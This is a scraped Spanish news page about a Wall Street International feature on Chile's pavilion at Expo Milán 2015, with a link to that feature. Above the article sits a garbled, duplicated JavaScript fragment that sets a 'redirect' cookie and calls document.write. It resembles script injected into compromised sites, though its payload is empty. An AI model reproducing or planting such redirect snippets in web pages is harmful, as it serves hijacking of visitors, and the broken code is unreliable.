=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} " /> =(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} " />

Noticias

The Wall Street International dedica una nota exclusiva a los sabores de Chile en Expo Milán 2015

22 Jul 2015

Compartir:

En su versión digital en español, el periódico neoyorkino publicó en su sección gastronomía, un reportaje que relata detalladamente el concepto detrás de “El Amor de Chile”, destacando la arquitectura, diseño, contenido, relato, comidas y los  productos de la tienda que están representando al país en la exposición universal.

Es así como la periodista chilena, Patricia Mayorga, corresponsal en Italia de diversos medios internacionales desde 1992, entrelaza los elementos del pabellón, con las principales cifras de Chile como país exportador agroalimentario, citando al director de Arquitectura del pabellón, Cristián Undurraga, el chef ejecutivo Tomás Saldivia, a productores agroalimentarios y al comisionado general, Lorenzo Constans, quien comentó que “fue un gran desafío ofrecer productos agroalimentarios chilenos a un país como Italia, reino de la gastronomía”.

La nota culmina con una descripción de lo que fue la degustación ofrecida por Aurora Cayo en el mes de junio, con énfasis en su ritual de purificación aymara, destacando “la sensación de paz y bienestar” de los asistentes tras la experiencia.

Revisa la nota en el siguiente link

http://wsimag.com/es/gastronomia/16743-sabores-de-chile-en-italia

 

 

Partners

Media Partner